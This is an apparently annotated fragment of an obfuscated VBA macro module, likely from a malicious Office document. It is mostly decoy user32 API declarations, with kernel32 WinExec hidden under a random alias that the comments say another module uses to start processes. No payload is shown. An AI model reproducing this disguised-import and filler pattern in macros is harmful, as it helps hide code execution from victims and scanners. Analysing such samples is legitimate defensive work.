Declare Function GetClipboardOwner Lib "user32" () As Long
Declare Function GetClipboardViewer Lib "user32" () As Long
Declare Function GetDesktopWindow Lib "user32" () As Long
Declare Function CloseClipboard Lib "user32" () As Long
Declare Function CloseDesktop Lib "user32" (ByVal sdfkn234jbhiwefisu As Long) As Boolean
Declare Function GetDoubleClickTime Lib "user32" () As Long
Declare Function GetFocus Lib "user32" () As Long
Declare Function GetForegroundWindow Lib "user32" () As Long
Declare Function GetInputState Lib "user32" () As Long
Declare Function GetKBCodePage Lib "user32" () As Long
Declare Function CopyIcon Lib "user32" (ByVal hIcon As Long) As Long
Declare Function CopyImage Lib "user32" (ByVal Handle As Long, ByVal bcvmnxsbcvjhvrjh2v As Long, ByVal n1 As Long, ByVal n2 As Long, ByVal un2 As Long) As Long
Declare Function CountClipboardFormats Lib "user32" () As Long
Declare Function CreateCaret Lib "user32" (ByVal hWnd As Long, ByVal hBitmap As Long, ByVal nWidth As Long, ByVal nHeight As Long) As Long
Declare Function GetKeyboardLayoutName Lib "user32" Alias "GetKeyboardLayoutNameA" (ByVal pwszKLID As String) As Long
Declare Function CloseWindowStation Lib "user32" (ByVal hWinSta As Long) As Boolean
Declare Function CopyCursor Lib "user32" (ByVal hcur As Long) As Long
Declare Function GetKeyboardType Lib "user32" (ByVal nTypeFlag As Long) As Long
Declare Function GetKeyNameText Lib "user32" Alias "GetKeyNameTextA" (ByVal lParam As Long, ByVal lpBuffer As String, ByVal nSize As Long) As Long
Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer
Declare Function GetLastActivePopup Lib "user32" (ByVal hwndOwnder As Long) As Long
Declare Function GetMenu Lib "user32" (ByVal hWnd As Long) As Long
Declare Function DlgDirSelectEx Lib "user32" Alias "DlgDirSelectExA" (ByVal hWndDlg As Long, ByVal lpszPath As String, ByVal cbPath As Long, ByVal idListBox As Long) As Long
Declare Function DrawIcon Lib "user32" (ByVal hDC As Long, ByVal x As Long, ByVal y As Long, ByVal hIcon As Long) As Long
Declare Function SetWindowText Lib "user32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal lpString As String) As Long
Declare Function SetWindowWord Lib "user32" (ByVal hWnd As Long, ByVal nIndex As Long, ByVal wNewWord As Long) As Long
Declare Function GetMessagePos Lib "user32" () As Long
Declare Function ExcludeUpdateRgn Lib "user32" (ByVal hDC As Long, ByVal hWnd As Long) As Long
Declare Function SetDoubleClickTime Lib "user32" (ByVal wCount As Long) As Long
Declare Function SetMenuDefaultItem Lib "user32" (ByVal hMenu As Long, ByVal uItem As Long, ByVal fByPos As Long) As Boolean
Declare Function SetMenuItemBitmaps Lib "user32" (ByVal hMenu As Long, ByVal nPosition As Long, ByVal wFlags As Long, ByVal hBitmapUnchecked As Long, ByVal hBitmapChecked As Long) As Long
Declare Function DrawIconEx Lib "user32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal cxWidth As Long, ByVal cyWidth As Long, ByVal istepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Boolean
Declare Function DrawMenuBar Lib "user32" (ByVal hWnd As Long) As Long
Declare Function DrawState Lib "user32" Alias "DrawStateA" (ByVal hDC As Long, ByVal hBrush As Long, ByVal lpDrawStateProc As Long, ByVal lParam As Long, ByVal wParam As Long, ByVal n1 As Long, ByVal n2 As Long, ByVal n3 As Long, ByVal n4 As Long, ByVal un As Long) As Boolean
Declare Function EnableMenuItem Lib "user32" (ByVal hMenu As Long, ByVal wIDEnableItem As Long, ByVal wEnable As Long) As Long
Declare Function SetMessageExtraInfo Lib "user32" (ByVal lParam As Long) As Long
Declare Function SetParent Lib "user32" (ByVal hWndChild As Long, ByVal hWndNewParent As Long) As Long
Declare Function SetCaretBlinkTime Lib "user32" (ByVal wMSeconds As Long) As Long
Declare Function SetCaretPos Lib "user32" (ByVal x As Long, ByVal y As Long) As Long
Declare Function GetMessageTime Lib "user32" () As Long
Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByVal lpvParam As Any, ByVal fuWinIni As Long) As Long
' kernel32 WinExec under the same alias as in the VBA7 branch; this is the
' import that vnkw3j2k4 in module hcvkf2kj calls to start processes.
Public Declare Function lgklj4ksd Lib "kernel32" Alias "WinExec" (ByVal dkngkljn3k As String, ByVal sudfhi3 As Long) As Long
Declare Function SetCapture Lib "user32" (ByVal hWnd As Long) As Long
Declare Function SetDlgItemInt Lib "user32" (ByVal hDlg As Long, ByVal nIDDlgItem As Long, ByVal wValue As Long, ByVal bSigned As Long) As Long
Declare Function GetMessageExtraInfo Lib "user32" () As Long
Declare Function GetOpenClipboardWindow Lib "user32" () As Long
Declare Function GetParent Lib "user32" (ByVal hWnd As Long) As Long
Declare Function GetProcessWindowStation Lib "user32" () As Long
Declare Function SendDlgItemMessage Lib "user32" Alias "SendDlgItemMessageA" (ByVal hDlg As Long, ByVal nIDDlgItem As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Long) As Long
Declare Function SetMessageQueue Lib "user32" (ByVal cMessagesMax As Long) As Boolean
Declare Function SetClassLong Lib "user32" Alias "SetClassLongA" (ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Declare Function SetClassWord Lib "user32" (ByVal hWnd As Long, ByVal nIndex As Long, ByVal wNewWord As Long) As Long
#End If
' Module-level variables of zzxmnkj325. They are Private, and this module has
' no procedures in the visible listing, so nothing shown here reads or writes
' them - presumably more filler.
Private vfw46ywefg As Integer
Private btn65 As Long
Private pyuo4i6 As Boolean
Private vzoiseorti2jofij As Long